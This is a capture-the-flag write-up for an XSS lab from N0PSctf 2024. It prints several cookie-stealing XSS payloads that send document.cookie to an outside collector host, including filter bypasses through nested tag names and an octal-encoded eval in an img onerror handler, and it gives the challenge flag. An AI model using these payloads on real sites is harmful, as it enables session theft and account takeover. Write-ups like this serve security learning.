échange floral 🐛
🥑 whoami 🥝 Posts 🍀 Plants ☔ Categories 🐝 Music 🍒 Books 🍂 CTFd
échange floral 🐛

N0PSctf - XSS lab

 included in  category Write-Ups
     303 words  2 minutes 

xss, EVERYWHERE

Note : If your payload does not seem to work at first, please use RequestBin to check before contacting the support.

Author: algorab

https://nopsctf-xss-lab.chals.io/

In order to complete this challenge, we have to send several payloads that will be more and more filtered.

The first payload is pretty basic XSS for cookie stealing, the bot will check on the web page and trigger the XSS that will steal his cookie.

javascript

<script>document.location="https://auteqia.free.beeceptor.com?c="+document.cookie</script>

And so the bot will go on this URL

Yessss ! We got a hit !

This time, we dont have the permission to use script, img and svg tags. And all the payload is turned into lowercase.

Let’s shoot my shot :

js

<scscriptript>document.location='https://auteqia.free.beeceptor.com?c='+document.cookie;</scscriptript>

My script balise can look a little bit odd, but the filter says that everytime it matches the string “script”, it’s erasing it. So, scscriptript becomes script and that’s a bypass !!

For this one, I tried pretty much all the payloads in Payload All The Things until I found the bypass using Octal representation.

So I used the img tag that I tweaked just like the script earlier. At first, the src was missing and I wasn’t able to understand why it wasn’t working. After adding the src, I changed from onload to onerror and it worked. I learned many things about XSS, especially good practices and quick wins

So, I wrote the payload and put it to CyberChef, replace the space by a backslash and here we go

Initial payload

js

document.location='https://auteqia.free.beeceptor.com?c='+document.cookie

Octal payload :

js

<iimgmg src='a' onerror=eval('144\157\143\165\155\145\156\164\56\154\157\143\141\164\151\157\156\75\47\150\164\164\160\163\72\57\57\141\165\164\145\161\151\141\56\146\162\145\145\56\142\145\145\143\145\160\164\157\162\56\143\157\155\77\143\75\47\53\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145') >

I worked so hard that my payload for the 3rd XSS is working for the 4th…

The same octal payload :

js

<iimgmg src='a' onerror=eval('144\157\143\165\155\145\156\164\56\154\157\143\141\164\151\157\156\75\47\150\164\164\160\163\72\57\57\141\165\164\145\161\151\141\56\146\162\145\145\56\142\145\145\143\145\160\164\157\162\56\143\157\155\77\143\75\47\53\144\157\143\165\155\145\156\164\56\143\157\157\153\151\145') >

And we finally got our flag : N0PS{cR05s_S1t3_Pr0_5cR1pT1nG}

Updated on 2024-06-02
 WebMediumXSSN0PSctf2024
 | Home